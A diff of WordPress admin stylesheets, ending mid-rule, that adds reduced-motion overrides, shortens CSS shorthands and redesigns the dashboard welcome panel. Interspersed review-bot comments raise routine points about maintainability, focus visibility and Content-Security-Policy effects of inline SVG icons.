 		border-left: 1px solid #dcdcde;
2211 2250
 	}
2212 2251
 
@@ -2367,7 +2406,7 @@ body.cheatin h1 {
2367 2406
 	color: #50575e;
2368 2407
 	font-size: 24px;
2369 2408
 	font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
2370
-	margin: 30px 0 0 0;
2409
+	margin: 30px 0 0;
2371 2410
 	padding: 0 0 7px;
2372 2411
 }
2373 2412
 

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/customize-controls-rtl.min.css


+ 54 - 15
app/wp-admin/css/customize-controls.css

@@ -105,6 +105,12 @@ body:not(.ready) #customize-save-button-wrapper .save {
105 105
 	height: 100%;
106 106
 }
107 107
 
108
+@media (prefers-reduced-motion: reduce) {
109
+	#customize-sidebar-outer-content {
110
+		transition: none;
111
+	}
112
+}
113
+
108 114
 #customize-theme-controls .control-section-outer {
109 115
 	display: none !important;
110 116
 }
@@ -123,6 +129,12 @@ body:not(.ready) #customize-save-button-wrapper .save {
123 129
 	transition: left .18s;
124 130
 }
125 131
 
132
+@media (prefers-reduced-motion: reduce) {
133
+	.outer-section-open .wp-full-overlay.expanded #customize-sidebar-outer-content {
134
+		transition: none;
135
+	}
136
+}
137
+
126 138
 .customize-outer-pane-parent {
127 139
 	margin: 0;
128 140
 }
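Review bot: placing a separate `@media (prefers-reduced-motion: reduce)` block after each transition, as done here for `.outer-section-open .wp-full-overlay.expanded #customize-sidebar-outer-content`, means every future `transition` added to this file needs its own hand-written override with a selector of matching specificity. Consider collecting the overrides into one commented block, or at least add a comment above the first one stating the convention so later edits follow it.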
@@ -537,6 +549,13 @@ body.trashing #publish-settings {
537 549
 		.15s border-color ease-in-out;
538 550
 }
539 551
 
552
+@media (prefers-reduced-motion: reduce) {
553
+	#customize-theme-controls .accordion-section-title,
554
+	#customize-outer-theme-controls .accordion-section-title {
555
+		transition: none;
556
+	}
557
+}
558
+
540 559
 #customize-controls #customize-theme-controls .customize-themes-panel .accordion-section-title {
541 560
 	color: #50575e;
542 561
 	background-color: #fff;
@@ -635,6 +654,14 @@ body.trashing #publish-settings {
635 654
 	transition: 0.18s transform cubic-bezier(0.645, 0.045, 0.355, 1); /* easeInOutCubic */
636 655
 }
637 656
 
657
+@media (prefers-reduced-motion: reduce) {
658
+	#customize-info,
659
+	#customize-theme-controls .customize-pane-parent,
660
+	#customize-theme-controls .customize-pane-child {
661
+		transition: none;
662
+	}
663
+}
664
+
638 665
 #customize-theme-controls .customize-pane-child.skip-transition {
639 666
 	transition: none;
640 667
 }
@@ -716,7 +743,7 @@ body.trashing #publish-settings {
716 743
 }
717 744
 
718 745
 .customize-section-title {
719
-	margin: -12px -12px 0 -12px;
746
+	margin: -12px -12px 0;
720 747
 	border-bottom: 1px solid #dcdcde;
721 748
 	background: #fff;
722 749
 }
@@ -739,11 +766,11 @@ div.customize-section-description p:last-child {
739 766
 
740 767
 #customize-theme-controls .customize-themes-panel h3.customize-section-title:first-child {
741 768
 	border-bottom: 1px solid #dcdcde;
742
-	padding: 12px 12px 12px 12px;
769
+	padding: 12px;
743 770
 }
744 771
 
745 772
 .ios #customize-theme-controls .customize-themes-panel h3.customize-section-title:first-child {
746
-	padding: 12px 12px 13px 12px;
773
+	padding: 12px 12px 13px;
747 774
 }
748 775
 
749 776
 .customize-section-title h3,
@@ -922,7 +949,8 @@ p.customize-section-description {
922 949
 .customize-control input[type="number"],
923 950
 .customize-control input[type="search"],
924 951
 .customize-control input[type="tel"],
925
-.customize-control input[type="url"] {
952
+.customize-control input[type="url"],
953
+.customize-control input[type="range"] {
926 954
 	width: 100%;
927 955
 	margin: 0;
928 956
 }
@@ -962,7 +990,7 @@ p.customize-section-description {
962 990
 
963 991
 .customize-section-description a.external-link:after {
964 992
 	font: 16px/11px dashicons;
965
-	content: "\f310";
993
+	content: "\f504";
966 994
 	top: 3px;
967 995
 	position: relative;
968 996
 	padding-left: 3px;
@@ -1113,7 +1141,7 @@ p.customize-section-description {
1113 1141
  */
1114 1142
 
1115 1143
 #customize-controls .customize-control-notifications-container { /* Scoped to #customize-controls for specificity over notification styles in common.css. */
1116
-	margin: 4px 0 8px 0;
1144
+	margin: 4px 0 8px;
1117 1145
 	padding: 0;
1118 1146
 	cursor: default;
1119 1147
 }
@@ -1126,7 +1154,7 @@ p.customize-section-description {
1126 1154
 
1127 1155
 #customize-controls .customize-control-notifications-container li.notice {
1128 1156
 	list-style: none;
1129
-	margin: 0 0 6px 0;
1157
+	margin: 0 0 6px;
1130 1158
 	padding: 9px 14px;
1131 1159
 	overflow: hidden;
1132 1160
 }
@@ -1428,7 +1456,7 @@ p.customize-section-description {
1428 1456
 }
1429 1457
 
1430 1458
 .customize-control-header .header-view:last-child {
1431
-	margin-bottom: 0px;
1459
+	margin-bottom: 0;
1432 1460
 }
1433 1461
 
1434 1462
 /* Convoluted, but 'outline' support isn't good enough yet */
@@ -1577,7 +1605,6 @@ p.customize-section-description {
1577 1605
 	font-family: Consolas, Monaco, monospace;
1578 1606
 	font-size: 12px;
1579 1607
 	padding: 6px 8px;
1580
-	-moz-tab-size: 2;
1581 1608
 	-o-tab-size: 2;
1582 1609
 	tab-size: 2;
1583 1610
 }
@@ -1664,7 +1691,7 @@ p.customize-section-description {
1664 1691
 	border-bottom: 1px solid #dcdcde;
1665 1692
 	border-left: none;
1666 1693
 	border-right: none;
1667
-	margin: 0 0 15px 0;
1694
+	margin: 0 0 15px;
1668 1695
 	padding-right: 100px; /* Space for the button */
1669 1696
 }
1670 1697
 
@@ -1705,6 +1732,12 @@ p.customize-section-description {
1705 1732
 	font-weight: 400;
1706 1733
 }
1707 1734
 
1735
+#customize-notifications-area .notification-message button.switch-to-editor {
1736
+	display: block;
1737
+	margin-top: 6px;
1738
+	font-weight: 400;
1739
+}
1740
+
1708 1741
 #customize-theme-controls .control-panel-themes > .accordion-section-title:after {
1709 1742
 	display: none;
1710 1743
 }
@@ -1723,6 +1756,12 @@ p.customize-section-description {
1723 1756
 	z-index: 20;
1724 1757
 }
1725 1758
 
1759
+@media (prefers-reduced-motion: reduce) {
1760
+	.control-panel-themes .customize-themes-full-container {
1761
+		transition: none;
1762
+	}
1763
+}
1764
+
1726 1765
 @media screen and (min-width: 1670px) {
1727 1766
 	.control-panel-themes .customize-themes-full-container {
1728 1767
 		width: 82%;
@@ -1860,7 +1899,7 @@ p.customize-section-description {
1860 1899
 }
1861 1900
 
1862 1901
 .control-panel-themes .customize-themes-notifications .notice {
1863
-	margin: 0 0 25px 0;
1902
+	margin: 0 0 25px;
1864 1903
 }
1865 1904
 
1866 1905
 .customize-themes-full-container .customize-themes-section {
@@ -1874,7 +1913,7 @@ p.customize-section-description {
1874 1913
 
1875 1914
 .control-section .customize-section-text-before {
1876 1915
 	padding: 0 0 8px 15px;
1877
-	margin: 15px 0 0 0;
1916
+	margin: 15px 0 0;
1878 1917
 	line-height: 16px;
1879 1918
 	border-bottom: 1px solid #dcdcde;
1880 1919
 	color: #50575e;
@@ -2095,7 +2134,7 @@ p.customize-section-description {
2095 2134
 		position: relative;
2096 2135
 		left: 0;
2097 2136
 		width: 100%;
2098
-		margin: 0 0 25px 0;
2137
+		margin: 0 0 25px;
2099 2138
 	}
2100 2139
 	.filter-drawer {
2101 2140
 		top: 46px;
@@ -2205,7 +2244,7 @@ p.customize-section-description {
2205 2244
 		width: 26px;
2206 2245
 		display: block;
2207 2246
 		line-height: 2.3;
2208
-		padding: 0 8px 0 8px;
2247
+		padding: 0 8px;
2209 2248
 		border-right: 1px solid #dcdcde;
2210 2249
 	}
2211 2250
 
@@ -2366,7 +2405,7 @@ body.cheatin h1 {
2366 2405
 	color: #50575e;
2367 2406
 	font-size: 24px;
2368 2407
 	font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
2369
-	margin: 30px 0 0 0;
2408
+	margin: 30px 0 0;
2370 2409
 	padding: 0 0 7px;
2371 2410
 }
2372 2411
 

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/customize-controls.min.css


+ 10 - 10
app/wp-admin/css/customize-nav-menus-rtl.css

@@ -12,7 +12,7 @@
12 12
 #customize-theme-controls .customize-section-title-nav_menus-heading,
13 13
 #customize-theme-controls .customize-section-title-menu_locations-heading,
14 14
 #customize-theme-controls .customize-section-title-menu_locations-description {
15
-	padding: 0 12px 0 12px;
15
+	padding: 0 12px;
16 16
 }
17 17
 
18 18
 #customize-theme-controls .customize-control-description.customize-section-title-menu_locations-description {
@@ -101,7 +101,7 @@
101 101
 .wp-customizer .menu-item-settings .description-thin {
102 102
 	width: 100%;
103 103
 	height: auto;
104
-	margin: 0 0 8px 0;
104
+	margin: 0 0 8px;
105 105
 }
106 106
 
107 107
 .wp-customizer .menu-item-settings input[type="text"] {
@@ -186,7 +186,7 @@
186 186
 }
187 187
 
188 188
 .wp-customizer .menu-settings dl {
189
-	margin: 12px 0 0 0;
189
+	margin: 12px 0 0;
190 190
 	padding: 0;
191 191
 }
192 192
 
@@ -323,7 +323,7 @@
323 323
 #available-menu-items .accordion-section-title .toggle-indicator:before {
324 324
 	content: "\f140";
325 325
 	display: block;
326
-	padding: 1px 0px 1px 2px;
326
+	padding: 1px 0 1px 2px;
327 327
 	speak: never;
328 328
 	border-radius: 50%;
329 329
 	color: #787c82;
@@ -582,8 +582,8 @@
582 582
 }
583 583
 
584 584
 #available-menu-items .accordion-section-content .available-menu-items-list {
585
-	margin: 0 0 45px 0;
586
-	padding: 1px 15px 15px 15px;
585
+	margin: 0 0 45px;
586
+	padding: 1px 15px 15px;
587 587
 }
588 588
 
589 589
 #available-menu-items .accordion-section-content .available-menu-items-list:only-child { /* Types that do not support new items for the current user */
@@ -591,7 +591,7 @@
591 591
 }
592 592
 
593 593
 #new-custom-menu-item .accordion-section-content {
594
-	padding: 0 15px 15px 15px;
594
+	padding: 0 15px 15px;
595 595
 }
596 596
 
597 597
 #available-menu-items .menu-item-tpl {
@@ -691,7 +691,7 @@
691 691
 	position: absolute;
692 692
 	right: 0;
693 693
 	top: 60px; /* below title div / search input */
694
-	bottom: 0px; /* 100% height that still triggers lazy load */
694
+	bottom: 0; /* 100% height that still triggers lazy load */
695 695
 	max-height: none;
696 696
 	width: 100%;
697 697
 	padding: 1px 15px 15px;
@@ -796,7 +796,7 @@ body.adding-menu-items #customize-preview iframe {
796 796
 
797 797
 #create-new-menu-submit {
798 798
 	float: left;
799
-	margin: 0 0 12px 0;
799
+	margin: 0 0 12px;
800 800
 }
801 801
 
802 802
 .menu-delete-item {
@@ -806,7 +806,7 @@ body.adding-menu-items #customize-preview iframe {
806 806
 }
807 807
 
808 808
 .assigned-menu-locations-title p {
809
-	margin: 0 0 8px 0;
809
+	margin: 0 0 8px;
810 810
 }
811 811
 
812 812
 li.assigned-to-menu-location .menu-delete-item {

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/customize-nav-menus-rtl.min.css


+ 10 - 10
app/wp-admin/css/customize-nav-menus.css

@@ -11,7 +11,7 @@
11 11
 #customize-theme-controls .customize-section-title-nav_menus-heading,
12 12
 #customize-theme-controls .customize-section-title-menu_locations-heading,
13 13
 #customize-theme-controls .customize-section-title-menu_locations-description {
14
-	padding: 0 12px 0 12px;
14
+	padding: 0 12px;
15 15
 }
16 16
 
17 17
 #customize-theme-controls .customize-control-description.customize-section-title-menu_locations-description {
@@ -100,7 +100,7 @@
100 100
 .wp-customizer .menu-item-settings .description-thin {
101 101
 	width: 100%;
102 102
 	height: auto;
103
-	margin: 0 0 8px 0;
103
+	margin: 0 0 8px;
104 104
 }
105 105
 
106 106
 .wp-customizer .menu-item-settings input[type="text"] {
@@ -185,7 +185,7 @@
185 185
 }
186 186
 
187 187
 .wp-customizer .menu-settings dl {
188
-	margin: 12px 0 0 0;
188
+	margin: 12px 0 0;
189 189
 	padding: 0;
190 190
 }
191 191
 
@@ -322,7 +322,7 @@
322 322
 #available-menu-items .accordion-section-title .toggle-indicator:before {
323 323
 	content: "\f140";
324 324
 	display: block;
325
-	padding: 1px 2px 1px 0px;
325
+	padding: 1px 2px 1px 0;
326 326
 	speak: never;
327 327
 	border-radius: 50%;
328 328
 	color: #787c82;
@@ -581,8 +581,8 @@
581 581
 }
582 582
 
583 583
 #available-menu-items .accordion-section-content .available-menu-items-list {
584
-	margin: 0 0 45px 0;
585
-	padding: 1px 15px 15px 15px;
584
+	margin: 0 0 45px;
585
+	padding: 1px 15px 15px;
586 586
 }
587 587
 
588 588
 #available-menu-items .accordion-section-content .available-menu-items-list:only-child { /* Types that do not support new items for the current user */
@@ -590,7 +590,7 @@
590 590
 }
591 591
 
592 592
 #new-custom-menu-item .accordion-section-content {
593
-	padding: 0 15px 15px 15px;
593
+	padding: 0 15px 15px;
594 594
 }
595 595
 
596 596
 #available-menu-items .menu-item-tpl {
@@ -690,7 +690,7 @@
690 690
 	position: absolute;
691 691
 	left: 0;
692 692
 	top: 60px; /* below title div / search input */
693
-	bottom: 0px; /* 100% height that still triggers lazy load */
693
+	bottom: 0; /* 100% height that still triggers lazy load */
694 694
 	max-height: none;
695 695
 	width: 100%;
696 696
 	padding: 1px 15px 15px;
@@ -795,7 +795,7 @@ body.adding-menu-items #customize-preview iframe {
795 795
 
796 796
 #create-new-menu-submit {
797 797
 	float: right;
798
-	margin: 0 0 12px 0;
798
+	margin: 0 0 12px;
799 799
 }
800 800
 
801 801
 .menu-delete-item {
@@ -805,7 +805,7 @@ body.adding-menu-items #customize-preview iframe {
805 805
 }
806 806
 
807 807
 .assigned-menu-locations-title p {
808
-	margin: 0 0 8px 0;
808
+	margin: 0 0 8px;
809 809
 }
810 810
 
811 811
 li.assigned-to-menu-location .menu-delete-item {

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/customize-nav-menus.min.css


+ 1 - 1
app/wp-admin/css/customize-widgets-rtl.css

@@ -82,7 +82,7 @@
82 82
 }
83 83
 
84 84
 .widget-inside {
85
-	padding: 1px 10px 10px 10px;
85
+	padding: 1px 10px 10px;
86 86
 	border-top: none;
87 87
 	line-height: 1.23076923;
88 88
 }

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/customize-widgets-rtl.min.css


+ 1 - 1
app/wp-admin/css/customize-widgets.css

@@ -81,7 +81,7 @@
81 81
 }
82 82
 
83 83
 .widget-inside {
84
-	padding: 1px 10px 10px 10px;
84
+	padding: 1px 10px 10px;
85 85
 	border-top: none;
86 86
 	line-height: 1.23076923;
87 87
 }

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/customize-widgets.min.css


+ 225 - 59
app/wp-admin/css/dashboard-rtl.css

@@ -111,56 +111,95 @@
111 111
 	max-width: 100%;
112 112
 }
113 113
 
114
+/* Screen meta exception for when the "Dashboard" heading is missing or located below the Welcome Panel. */
115
+.index-php #screen-meta-links {
116
+	margin: 0 0 8px 20px;
117
+}
118
+
114 119
 /* Welcome Panel */
115 120
 .welcome-panel {
116 121
 	position: relative;
117 122
 	overflow: auto;
118 123
 	margin: 16px 0;
119
-	padding: 23px 10px 0;
120
-	border: 1px solid #c3c4c7;
121
-	box-shadow: 0 1px 1px rgba(0, 0, 0, 0.04);
122
-	background: #fff;
123
-	font-size: 13px;
124
-	line-height: 1.7;
124
+	background-color: #e7ebfd;
125
+	font-size: 14px;
126
+	line-height: 1.3;
127
+	clear: both;
125 128
 }
126 129
 
127 130
 .welcome-panel h2 {
128 131
 	margin: 0;
129
-	font-size: 21px;
130
-	font-weight: 400;
131
-	line-height: 1.2;
132
+	font-size: 48px;
133
+	font-weight: 600;
134
+	line-height: 1.25;
132 135
 }
133 136
 
134 137
 .welcome-panel h3 {
135
-	margin: 1.33em 0 0;
136
-	font-size: 16px;
138
+	margin: 0;
139
+	font-size: 20px;
140
+	font-weight: 400;
141
+	line-height: 1.4;
137 142
 }
138 143
 
139
-.welcome-panel li {
140
-	font-size: 14px;
144
+.welcome-panel p {
145
+	font-size: inherit;
146
+	line-height: inherit;
141 147
 }
142 148
 
143
-.welcome-panel p {
144
-	color: #646970;
149
+.welcome-panel-header {
150
+	--about-header-image-width: 521px;
151
+	--about-header-bg-width: calc(var(--about-header-image-width) * 0.55);
152
+	--about-header-bg-offset-inline: 2rem;
153
+
154
+	position: relative;
145 155
 }
146 156
 
147
-.welcome-panel li a {
157
+.welcome-panel-header-image {
158
+	position: absolute;
159
+	top: -1rem;
160
+	left: var(--about-header-bg-offset-inline);
161
+	bottom: 0;
162
+	width: var(--about-header-bg-width);
163
+	height: auto;
164
+}
165
+
166
+.welcome-panel-header-image svg {
167
+	width: 100%;
168
+	height: auto;
169
+}
170
+
171
+.welcome-panel-header a {
172
+	color: inherit;
173
+}
174
+
175
+.welcome-panel-header a:focus,
176
+.welcome-panel-header a:hover {
177
+	color: inherit;
148 178
 	text-decoration: none;
149 179
 }
150 180
 
151
-.welcome-panel .about-description {
152
-	font-size: 16px;
153
-	margin: 0;
181
+.welcome-panel-header a:focus,
182
+.welcome-panel .welcome-panel-close:focus {
183
+	outline-color: currentColor;
184
+	outline-offset: 1px;
185
+	box-shadow: none;
186
+}
187
+
188
+.welcome-panel-header p {
189
+	margin: 0.5em 0 0;
190
+	font-size: 20px;
191
+	line-height: 1.4;
154 192
 }
155 193
 
156 194
 .welcome-panel .welcome-panel-close {
157 195
 	position: absolute;
158 196
 	top: 10px;
159 197
 	left: 10px;
160
-	padding: 10px 21px 10px 15px;
198
+	padding: 10px 24px 10px 15px;
161 199
 	font-size: 13px;
162 200
 	line-height: 1.23076923; /* Chrome rounding, needs to be 16px equivalent */
163 201
 	text-decoration: none;
202
+	z-index: 1; /* Raise above the version image. */
164 203
 }
165 204
 
166 205
 .welcome-panel .welcome-panel-close:before {
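Review bot: in the `.welcome-panel-header a:focus, .welcome-panel .welcome-panel-close:focus` rule, `box-shadow: none` removes the focus ring while only `outline-color` and `outline-offset` are set, and neither has a visible effect unless an outline style and width are defined elsewhere. Set the full `outline` here, or point to the rule that supplies it, so keyboard focus on the close link and the header links stays visible against the `#e7ebfd` background.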
@@ -168,8 +207,23 @@
168 207
 	top: 8px;
169 208
 	right: 0;
170 209
 	transition: all .1s ease-in-out;
210
+	content: '\f335';
211
+	font-size: 24px;
212
+	color: #1d2327;
171 213
 }
172 214
 
215
+.welcome-panel .welcome-panel-close {
216
+	color: #1d2327;
217
+}
218
+
219
+.welcome-panel .welcome-panel-close:hover,
220
+.welcome-panel .welcome-panel-close:focus,
221
+.welcome-panel .welcome-panel-close:hover::before,
222
+.welcome-panel .welcome-panel-close:focus::before {
223
+	color: #2271b1;
224
+}
225
+
226
+/* @deprecated 5.9.0 -- Button removed from panel. */
173 227
 .wp-core-ui .welcome-panel .button.button-hero {
174 228
 	margin: 15px 0 3px 13px;
175 229
 	padding: 12px 36px;
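Review bot: the new `.welcome-panel .welcome-panel-close { color: #1d2327; }` block repeats a selector that already has a rule a few lines above (the one setting `position: absolute` and the padding); fold `color` into that block. The added hover rules also use `:hover::before` while the neighbouring close-button rule uses the single-colon `:before`; pick one notation for the file.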
@@ -179,54 +233,98 @@
179 233
 }
180 234
 
181 235
 .welcome-panel-content {
182
-	margin-right: 13px;
236
+	min-height: 400px;
237
+	display: flex;
238
+	flex-direction: column;
239
+	justify-content: space-between;
240
+}
241
+
242
+.welcome-panel-header {
243
+	box-sizing: border-box;
244
+	margin-right: auto;
245
+	margin-left: auto;
183 246
 	max-width: 1500px;
247
+	width: 100%;
248
+	padding: 48px 48px 80px 0;
249
+	padding-left: calc(var(--about-header-bg-width) + (var(--about-header-bg-offset-inline) * 2));
184 250
 }
185 251
 
186 252
 .welcome-panel .welcome-panel-column-container {
253
+	box-sizing: border-box;
254
+	width: 100%;
187 255
 	clear: both;
188
-	position: relative;
256
+	display: grid;
257
+	z-index: 1;
258
+	padding: 48px;
259
+	grid-template-columns: repeat(3, 1fr);
260
+	gap: 32px;
261
+	align-self: flex-end;
262
+	background: #fff;
189 263
 }
190 264
 
191
-.welcome-panel .welcome-panel-column {
192
-	width: 32%;
193
-	min-width: 200px;
194
-	float: right;
265
+[class*="welcome-panel-icon"] {
266
+	height: 60px;
267
+	width: 60px;
268
+	background-color: #1d2327;
269
+	background-position: center;
270
+	background-size: 24px 24px;
271
+	background-repeat: no-repeat;
272
+	border-radius: 100%;
273
+}
274
+
275
+.welcome-panel-column {
276
+	display: grid;
277
+	grid-template-columns: min-content 1fr;
278
+	gap: 24px;
195 279
 }
196 280
 
197
-.welcome-panel .welcome-panel-column:first-child {
198
-	width: 36%;
281
+.welcome-panel-icon-pages {
282
+	background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24'%3E%3Cpath fill='%23fff' d='M7 13.8h6v-1.5H7v1.5zM18 16V4c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v12c0 1.1.9 2 2 2h10c1.1 0 2-.9 2-2zM5.5 16V4c0-.3.2-.5.5-.5h10c.3 0 .5.2.5.5v12c0 .3-.2.5-.5.5H6c-.3 0-.5-.2-.5-.5zM7 10.5h8V9H7v1.5zm0-3.3h8V5.8H7v1.4zM20.2 6v13c0 .7-.6 1.2-1.2 1.2H8v1.5h11c1.5 0 2.7-1.2 2.7-2.8V6h-1.5z' /%3E%3C/svg%3E");
199 283
 }
200 284
 
201
-.welcome-panel-column p.hide-if-no-customize {
202
-	margin-top: 10px;
285
+.welcome-panel-icon-layout {
286
+	background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24'%3E%3Cpath fill='%23fff' d='M18 5.5H6a.5.5 0 00-.5.5v3h13V6a.5.5 0 00-.5-.5zm.5 5H10v8h8a.5.5 0 00.5-.5v-7.5zm-10 0h-3V18a.5.5 0 00.5.5h2.5v-8zM6 4h12a2 2 0 012 2v12a2 2 0 01-2 2H6a2 2 0 01-2-2V6a2 2 0 012-2z' /%3E%3C/svg%3E");
203 287
 }
204 288
 
205
-.welcome-panel-column p {
206
-	margin-top: 7px;
207
-	color: #3c434a;
289
+.welcome-panel-icon-styles {
290
+	background-image: url("data:image/svg+xml,%3Csvg viewBox='0 0 24 24' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath fill='%23fff' d='M12 4c-4.4 0-8 3.6-8 8v.1c0 4.1 3.2 7.5 7.2 7.9h.8c4.4 0 8-3.6 8-8s-3.6-8-8-8zm0 15V5c3.9 0 7 3.1 7 7s-3.1 7-7 7z' /%3E%3C/svg%3E");
208 291
 }
209 292
 
293
+/* @deprecated 5.9.0 -- Section removed from welcome panel. */
210 294
 .welcome-panel .welcome-widgets-menus {
211 295
 	line-height: 1.14285714;
212 296
 }
213 297
 
298
+/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
214 299
 .welcome-panel .welcome-panel-column ul {
215 300
 	margin: 0.8em 0 1em 1em;
216 301
 }
217 302
 
303
+/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
304
+.welcome-panel li {
305
+	font-size: 14px;
306
+}
307
+
308
+/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
309
+.welcome-panel li a {
310
+	text-decoration: none;
311
+}
312
+
313
+/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
218 314
 .welcome-panel .welcome-panel-column li {
219 315
 	line-height: 1.14285714;
220 316
 	list-style-type: none;
221 317
 	padding: 0 0 8px;
222 318
 }
223 319
 
320
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
224 321
 .welcome-panel .welcome-icon {
225 322
 	background: transparent !important;
226 323
 }
227 324
 
228 325
 /* Welcome Panel and Right Now common Icons style */
229 326
 
327
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
230 328
 .welcome-panel .welcome-icon:before,
231 329
 #dashboard_right_now li a:before,
232 330
 #dashboard_right_now li span:before,
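Review bot: The three `.welcome-panel-icon-pages`, `.welcome-panel-icon-layout` and `.welcome-panel-icon-styles` rules load their icons from inline `data:image/svg+xml` URLs in `background-image`, which are subject to the `img-src` directive, so an install that sends a Content-Security-Policy for wp-admin without `data:` in `img-src` will render empty dark circles; this dependency should be documented next to the rules. The shared rule's selector `[class*="welcome-panel-icon"]` also matches any element whose class attribute merely contains that substring, so a dedicated shared class on the icon elements would be a narrower hook.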
@@ -245,47 +343,56 @@
245 343
 
246 344
 /* Welcome Panel specific Icons styles */
247 345
 
346
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
248 347
 .welcome-panel .welcome-write-blog:before,
249 348
 .welcome-panel .welcome-edit-page:before {
250 349
 	content: "\f119";
251 350
 	top: -3px;
252 351
 }
253 352
 
353
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
254 354
 .welcome-panel .welcome-add-page:before {
255 355
 	content: "\f132";
256 356
 	top: -1px;
257 357
 }
258 358
 
359
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
259 360
 .welcome-panel .welcome-setup-home:before {
260 361
 	content: "\f102";
261 362
 	top: -1px;
262 363
 }
263 364
 
365
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
264 366
 .welcome-panel .welcome-view-site:before {
265 367
 	content: "\f115";
266 368
 	top: -2px;
267 369
 }
268 370
 
371
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
269 372
 .welcome-panel .welcome-widgets-menus:before {
270 373
 	content: "\f116";
271 374
 	top: -2px;
272 375
 }
273 376
 
377
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
274 378
 .welcome-panel .welcome-widgets:before {
275 379
 	content: "\f538";
276 380
 	top: -2px;
277 381
 }
278 382
 
383
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
279 384
 .welcome-panel .welcome-menus:before {
280 385
 	content: "\f163";
281 386
 	top: -2px;
282 387
 }
283 388
 
389
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
284 390
 .welcome-panel .welcome-comments:before {
285 391
 	content: "\f117";
286 392
 	top: -1px;
287 393
 }
288 394
 
395
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
289 396
 .welcome-panel .welcome-learn-more:before {
290 397
 	content: "\f118";
291 398
 	top: -1px;
@@ -355,7 +462,7 @@
355 462
 .community-events-errors [aria-hidden="true"],
356 463
 .community-events-loading[aria-hidden="true"],
357 464
 .community-events[aria-hidden="true"],
358
-.community-events [aria-hidden="true"] {
465
+.community-events form[aria-hidden="true"] {
359 466
 	display: none;
360 467
 }
361 468
 
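Review bot: Narrowing `.community-events [aria-hidden="true"]` to `.community-events form[aria-hidden="true"]` means any non-form descendant marked `aria-hidden="true"` is no longer covered by this `display: none` rule and would render visibly while staying hidden from assistive technology; confirm that the form is the only descendant that toggles `aria-hidden` in this widget, or keep a rule for the others.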
@@ -519,7 +626,7 @@ body #dashboard-widgets .postbox form .submit {
519 626
 
520 627
 #dashboard_primary .rss-widget {
521 628
 	font-size: 13px;
522
-	padding: 0 12px 0;
629
+	padding: 0 12px;
523 630
 }
524 631
 
525 632
 #dashboard_primary .rss-widget:last-child {
@@ -600,7 +707,7 @@ body #dashboard-widgets .postbox form .submit {
600 707
 	color: #50575e;
601 708
 	background: #f6f7f7;
602 709
 	border-top: 1px solid #f0f0f1;
603
-	padding: 10px 12px 6px 12px;
710
+	padding: 10px 12px 6px;
604 711
 }
605 712
 
606 713
 #dashboard_right_now .sub h3 {
@@ -836,7 +943,7 @@ body #dashboard-widgets .postbox form .submit {
836 943
 }
837 944
 
838 945
 #activity-widget #the-comment-list .comment-item p.row-actions {
839
-	margin: 4px 0 0 0;
946
+	margin: 4px 0 0;
840 947
 }
841 948
 
842 949
 #activity-widget #the-comment-list .comment-item:first-child {
@@ -1103,6 +1210,18 @@ a.rsswidget {
1103 1210
 /* =Media Queries
1104 1211
 -------------------------------------------------------------- */
1105 1212
 
1213
+@media only screen and (min-width: 1600px) {
1214
+	.welcome-panel .welcome-panel-column-container {
1215
+		display: flex;
1216
+		justify-content: center;
1217
+	}
1218
+
1219
+	.welcome-panel-column {
1220
+		width: 100%;
1221
+		max-width: 460px;
1222
+	}
1223
+}
1224
+
1106 1225
 /* one column on the dash */
1107 1226
 @media only screen and (max-width: 799px) {
1108 1227
 	#wpbody-content #dashboard-widgets .postbox-container {
@@ -1214,25 +1333,67 @@ a.rsswidget {
1214 1333
 }
1215 1334
 
1216 1335
 @media screen and (max-width: 870px) {
1217
-	.welcome-panel .welcome-panel-column,
1218
-	.welcome-panel .welcome-panel-column:first-child {
1219
-		display: block;
1220
-		float: none;
1221
-		width: 100%;
1222
-	}
1223
-
1336
+	/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
1224 1337
 	.welcome-panel .welcome-panel-column li {
1225 1338
 		display: inline-block;
1226 1339
 		margin-left: 13px;
1227 1340
 	}
1228 1341
 
1342
+	/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
1229 1343
 	.welcome-panel .welcome-panel-column ul {
1230 1344
 		margin: 0.4em 0 0;
1231 1345
 	}
1232 1346
 
1233 1347
 }
1234 1348
 
1349
+@media screen and (max-width: 1180px) and (min-width: 783px) {
1350
+	.welcome-panel-column {
1351
+		grid-template-columns: 1fr;
1352
+	}
1353
+
1354
+	[class*="welcome-panel-icon"] {
1355
+		display: none;
1356
+	}
1357
+}
1358
+
1235 1359
 @media screen and (max-width: 782px) {
1360
+	.welcome-panel-header {
1361
+		--about-header-bg-width: calc(var(--about-header-image-width) * 0.4);
1362
+		--about-header-bg-offset-inline: 1rem;
1363
+	}
1364
+
1365
+	.welcome-panel-header-image {
1366
+		top: 2rem;
1367
+	}
1368
+
1369
+	.welcome-panel .welcome-panel-column-container {
1370
+		grid-template-columns: 1fr;
1371
